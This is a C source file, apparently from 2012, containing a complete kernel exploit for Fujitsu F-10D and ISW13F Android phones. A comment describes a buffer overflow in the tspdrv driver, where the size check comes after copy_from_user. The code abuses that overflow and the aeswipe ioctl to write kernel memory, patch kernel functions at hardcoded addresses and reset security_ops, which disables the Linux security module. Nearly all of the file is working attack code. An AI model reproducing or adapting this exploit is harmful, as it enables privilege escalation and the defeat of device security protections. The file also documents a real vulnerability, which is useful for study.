f10dunlock.c

1. /*
2.  *  Copyright (c) 2012 goroh_kun
3.  *
4.  *  2012/08/31
5.  *  goroh.kun@gmail.com
6.  */
7.  
8. #include <stdio.h>
9. #include <stdint.h>
10. #include <stdlib.h>
11. #include <unistd.h>
12. #include <fcntl.h>
13. #include <errno.h>
14. #include <sys/stat.h>
15. #include <sys/mman.h>
16. #include <sys/ioctl.h>
17.  
18. void memdump(char* addr, int num)
19. {
20.     int i, j;
21.     int n = (num + 15) / 16;
22.     for (j=0; j<n; j++){
23.         printf("%08x : ", addr);
24.         for(i=0; i<16; i++){
25.             printf("%02x ", *addr++);
26.         }
27.         addr -= 16;
28.         for(i=0; i<16; i++){
29.             if (*addr>=0x20 && *addr<0x80) {
30.                  printf("%c", *addr);
31.             } else {
32.                 printf(".");
33.             }
34.             addr++;
35.         }
36.         printf("\n");
37.     }
38. }
39.  
40. #if 0
41. ########################################################################################
42. There is vulnerability in function "write" in kernel/drivers/tspdrv/tspdrv.c.
43.  
44. static ssize_t write(struct file *file, const char *buf, size_t count, loff_t *ppos)
45. {
46. ....
47.     /* Copy immediately the input buffer */
48.     if (0 != copy_from_user(g_cWriteBuffer, buf, count))
49.     {
50.         /* Failed to copy all the data, exit */
51.         DbgOut((KERN_ERR "tspdrv: copy_from_user failed.\n"));
52.         return 0;
53.     }
54.  
55.     /* Check buffer size */
56.     if ((count <= SPI_HEADER_SIZE) || (count > SPI_BUFFER_SIZE))
57.     {
58.         DbgOut((KERN_ERR "tspdrv: invalid write buffer size.\n"));
59.         return 0;
60.     }
61. ....
62. }
63.  
64.  
65.   We have to check the parameter "count" *before* using copy_from_user.
66.   Or if we set the parameter larger than g_cWriteBuffer size, it occurs memory overflow.
67.   In this case, I override a variable named g_lptsAuthContext by using this vulnerability.
68.   The variable is located like bellow.
69.  
70. g_cWriteBuffer    : 0xc09ae698
71. g_CalibrateBuffer : 0xc09ae6d0
72. g_lptsAuthContext : 0xc09ae6ec
73.  
74. ########################################################################################
75. #endif
76.  
77. #define BUF_SIZE  (0xc09ae6f0 - 0xc09ae698)
78. #define TSPDRV_MAGIC_NUMBER                 0x494D4D52
79. void set_lptsAuthContext(unsigned int addr)
80. {
81.   char buf[BUF_SIZE] = {0};
82.   buf[BUF_SIZE - 4] = addr & 0xff;
83.   buf[BUF_SIZE - 3] = (addr >> 8) & 0xff;
84.   buf[BUF_SIZE - 2] = (addr >> 16) & 0xff;
85.   buf[BUF_SIZE - 1] = (addr >> 24) & 0xff;
86.   int fdtsp = open("/dev/tspdrv", O_RDWR);
87.   int ret = ioctl(fdtsp, TSPDRV_MAGIC_NUMBER, 0);
88.   ret = write(fdtsp, buf, BUF_SIZE);
89.   close(fdtsp);
90. }
91.  
92. /*
93. ...
94. 100001a0 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ................
95. 100001b0 : -- -- -- -- -- -- -- -- 00 00 00 00 aa aa aa aa ................
96. 100001c0 : -- -- -- -- -- -- -- -- -- -- -- -- 01 00 00 00 ................
97. ...
98. 10000250 :*xx xx xx xx -- -- -- -- -- -- -- -- -- -- -- -- ................
99. ...
100. * pid is stored on xx xx xx xx, when /dev/aeswipe is opened.
101. * an ioctl AUTH_IOCTL_SET_TIMEOUT value is stored on aa aa aa aa.
102. */
103.  
104. typedef unsigned int uint32;
105. typedef int int32;
106. typedef struct _tag_TrIoctlHeader
107. {
108.     uint32 uiSize;          /* INOUT: Total size of the structure including header.         */
109.                             /*        On input it contains the size of the input buffer.    */
110.                             /*        On output it contains the size of the output buffer.  */
111.  
112.     uint32 uiOperationId;   /*    IN: ID of the desired operation. Needed for TransportIOCL */
113.                             /*        or on systems where everything is tunneled through a  */
114.                             /*        single IOCTL. See TrOperationId.                      */
115.  
116.     int32  retCode;         /*   OUT: Return code of the IOCTL.                             */
117. } tsTrIoctlHeader;
118.  
119. typedef struct _tag_TrTimeoutIoctlBuffer
120. {
121.     tsTrIoctlHeader sHeader;   /* INOUT: Header.         */
122.     uint32          uiTimeout; /*    IN: Timeout value.  */
123. } tsTrTimeoutIoctlBuffer;
124. #define AUTH_IOCTL_BASE ('x')
125. #define AUTH_IOCTL_SET_TIMEOUT          _IOWR( AUTH_IOCTL_BASE, 10, tsTrTimeoutIoctlBuffer )
126.  
127. void mempatch0(unsigned addr)
128. {
129.   char buf[0x300] = {0};
130.   set_lptsAuthContext((unsigned)buf);
131.   int fdaes = open("/dev/aeswipe", O_RDWR);
132.   set_lptsAuthContext(addr - 0x1b8);
133.   close(fdaes);
134.   set_lptsAuthContext(0);
135. }
136.  
137. void mempatch(int fd, unsigned addr, unsigned value)
138. {
139.   tsTrTimeoutIoctlBuffer param = {0};
140.   param.sHeader.uiSize = sizeof(param);
141.   param.uiTimeout = value;
142.  
143.   set_lptsAuthContext(addr - 0x1bc);
144.   ioctl(fd, AUTH_IOCTL_SET_TIMEOUT, &param);
145.   usleep(10000);
146.   set_lptsAuthContext(0);
147. }
148.  
149. static const unsigned original_code[] = {
150.   0xe24cb004, // SUB             R11, R12, #4
151.   0xe1a06001, // MOV             R6, R1
152. };
153.  
154. static const unsigned patched_code[] = {
155.   0xe5900084, // LDR             R0, [R0,#private] ; file->private
156.   0xe89da8f0, // LDMFD           SP, {R4-R7,R11,SP,PC}
157. };
158.  
159. static int is_isw13f = 0;
160. static int is_newf10d = 0;
161. unsigned int get_private(int fd, int fd2, unsigned aesbuf)
162. {
163.   char buf[0x10] = {0};
164.   unsigned int ret = 0;
165.  
166.   if(is_isw13f){
167.     mempatch(fd2, 0xc043f9e8, patched_code[0]); // module_entry_write+0x8
168.     mempatch(fd2, 0xc043f9ec, patched_code[1]); // module_entry_write+0xc
169.   }else{
170.     if(is_newf10d){
171.       mempatch(fd2, 0xc044d238, patched_code[0]); // module_entry_write+0x8
172.       mempatch(fd2, 0xc044d23c, patched_code[1]); // module_entry_write+0xc
173.     }else{
174.       mempatch(fd2, 0xc044d20c, patched_code[0]); // module_entry_write+0x8
175.       mempatch(fd2, 0xc044d210, patched_code[1]); // module_entry_write+0xc
176.     }
177.   }
178.  
179.   set_lptsAuthContext((unsigned)aesbuf);
180.   ret = write(fd, buf, 1);
181.   usleep(10000);
182.  
183.   if(is_isw13f){
184.     mempatch(fd2, 0xc043f9e8, original_code[0]); // module_entry_write+0x8
185.     mempatch(fd2, 0xc043f9ec, original_code[1]); // module_entry_write+0xc
186.   }else{
187.     if(is_newf10d){
188.       mempatch(fd2, 0xc044d238, original_code[0]); // module_entry_write+0x8
189.       mempatch(fd2, 0xc044d23c, original_code[1]); // module_entry_write+0xc
190.     }else{
191.       mempatch(fd2, 0xc044d20c, original_code[0]); // module_entry_write+0x8
192.       mempatch(fd2, 0xc044d210, original_code[1]); // module_entry_write+0xc
193.     }
194.   }
195.   return ret;
196. }
197.  
198. int main(int argc, char** argv)
199. {
200.   char buf[0x300] = {0};
201.   int recovery_context = 1;
202.   unsigned int context_addr = 0;
203.   if(argc >= 2 && atoi(argv[1])==1){
204.     printf("use ISW13F address\n");
205.     is_isw13f = 1;
206.   }
207.   if(argc >= 2 && atoi(argv[1])==2){
208.     printf("use new F-10D address\n");
209.     is_newf10d = 1;
210.   }
211.  
212.   int fdaes = open("/dev/aeswipe", O_RDWR);
213.   printf("fdaes = %d\n", fdaes);
214.   if(fdaes < 0){
215.     printf("open aeswipe error, so try to disable LSM without recovery g_lptsAuthContext\n");
216.     recovery_context = 0;
217.   }
218.  
219.   set_lptsAuthContext((unsigned)buf);
220.   int fdaes2 = open("/dev/aeswipe", O_RDWR);
221.   set_lptsAuthContext(0);
222.   printf("fdaes2 = %d\n", fdaes2);
223.  
224.   //AuthTransportIOControl disable AbortCheck
225.   if(is_isw13f){
226.     mempatch0(0xc043e2fc); // 0xc043e2fc, 0xc043e310 = 0
227.     mempatch0(0xc043e300); // 0xc043e300, 0xc043e314 = 0
228.     mempatch0(0xc043e304); // 0xc043e304, 0xc043e318 = 0
229.     mempatch0(0xc043e308); // 0xc043e308, 0xc043e31c = 0
230.     mempatch0(0xc043e30c); // 0xc043e30c, 0xc043e320 = 0
231.   }else{
232.     if(is_newf10d){
233.       mempatch0(0xc044bb4c); // 0xc044bb4c, 0xc044bb60 = 0
234.       mempatch0(0xc044bb50); // 0xc044bb50, 0xc044bb64 = 0
235.       mempatch0(0xc044bb54); // 0xc044bb54, 0xc044bb68 = 0
236.       mempatch0(0xc044bb58); // 0xc044bb58, 0xc044bb6c = 0
237.       mempatch0(0xc044bb5c); // 0xc044bb5c, 0xc044bb70 = 0
238.     }else{
239.       mempatch0(0xc044bb14); // 0xc044bb14, 0xc044bb28 = 0
240.       mempatch0(0xc044bb18); // 0xc044bb18, 0xc044bb2c = 0
241.       mempatch0(0xc044bb1c); // 0xc044bb1c, 0xc044bb30 = 0
242.       mempatch0(0xc044bb20); // 0xc044bb20, 0xc044bb34 = 0
243.       mempatch0(0xc044bb24); // 0xc044bb24, 0xc044bb38 = 0
244.     }
245.   }
246.  
247.   if(recovery_context){
248.     context_addr = get_private(fdaes, fdaes2, (unsigned)buf);
249.     printf("file->private = %08x\n", context_addr);
250.     if(context_addr >= 0xffff0000) context_addr = 0;
251.     if(context_addr <= 0xc0000000) context_addr = 0;
252.   }
253.  
254.   if(is_isw13f){
255.     mempatch(fdaes2, 0xc09e5290, 0xc09308ec); // security_ops = default_security_ops
256.   }else{
257.     mempatch(fdaes2, 0xc098ed48, 0xc08da184); // security_ops = default_security_ops
258.   }
259.  
260.   set_lptsAuthContext((unsigned)buf);
261.   close(fdaes2);
262.  
263.   set_lptsAuthContext(context_addr);
264.   close(fdaes);
265.   return 0;
266. }